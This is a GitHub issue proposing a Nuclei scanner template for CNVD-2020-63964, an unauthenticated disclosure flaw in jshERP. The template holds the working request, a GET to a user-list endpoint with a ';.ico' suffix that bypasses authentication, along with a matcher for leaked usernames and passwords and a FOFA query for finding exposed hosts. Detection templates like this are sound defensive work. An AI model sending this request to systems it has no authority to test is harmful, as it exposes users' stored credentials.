### ISSUE TITLE
CNVD-2020-63964

### ISSUE THREAD

**Issue by brucelsone** [projectdiscovery/nuclei-templates#7545]
### Template Information:
jshERP that can reveal sensitive information including system credentials without credentials.

### Nuclei Template:

```yaml
id: CNVD-2020-63964

info:
  name: jshERP - Information Disclosure
  author: brucelsone
  severity: high
  description: jshERP that can reveal sensitive information including system credentials without credentials.
  reference:
    - https://cn-sec.com/archives/1798444.html
  metadata:
    max-request: 2
    fofa-query: jshERP-boot
  tags: jshERP,password,disclosure,cnvd

http:
  - method: GET
    path:
      - "{{BaseURL}}/jshERP-boot/user/getAllList;.ico"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "username"
          - "password"
        condition: and

      - type: status
        status:
          - 200
```
